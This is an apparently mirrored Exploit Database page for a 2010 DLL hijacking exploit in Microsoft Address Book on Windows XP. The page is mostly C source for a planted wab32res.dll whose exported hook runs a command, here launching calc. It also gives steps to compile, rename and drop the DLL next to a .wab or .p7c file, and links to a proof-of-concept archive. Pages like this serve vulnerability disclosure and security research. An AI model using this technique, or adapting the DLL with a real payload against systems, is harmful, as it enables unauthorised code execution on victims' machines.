Microsoft Address Book 6.00.2900.5512 – ‘wab32res.dll’ DLL Hijacking

Exploit Database
21 阅读

作者： Beenu Arora

日期： 2010-08-25
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/14745/

/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Anirban , Dinesh Arora
# Site : www.beenuarora.com

Exploit Title: Microsoft Address Book DLL Hijacking
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , Microsoft Address Book 6.00.2900.5512
Vulnerable extensions: wab , p7c

Compile and rename to wab32res.dll, create a file in the same dir with one
of the following extensions:
.wab,p7c
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}

// POC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14745.zip

last Exploits
Microsoft Address Book 6.00.2900.5512 – ‘wab32res.dll’ DLL Hijacking的更多信息

Microsoft Windows 10 – DSSVC DSOpenSharedFile Arbitrary File Delete Privilege Escalation：
Roxio Creator DE – ‘HomeUtils9.dll’ DLL Hijacking：
Viscosity – setuid-set ViscosityHelper Privilege Escalation (Metasploit)：
Microsoft Windows XP SP3 – ‘MQAC.sys’ Arbitrary Write Privilege Escalation (Metasploit)：
iSmartViewPro 1.5 – ‘Password’ Buffer Overflow：
Cisco Umbrella Roaming Client 2.0.168 – Local Privilege Escalation：
ELAN Smart-Pad 11.10.15.1 – ‘ETDService’ Unquoted Service Path：
Linux Kernel 2.6.x – ‘rds_recvmsg()’ Local Information Disclosure：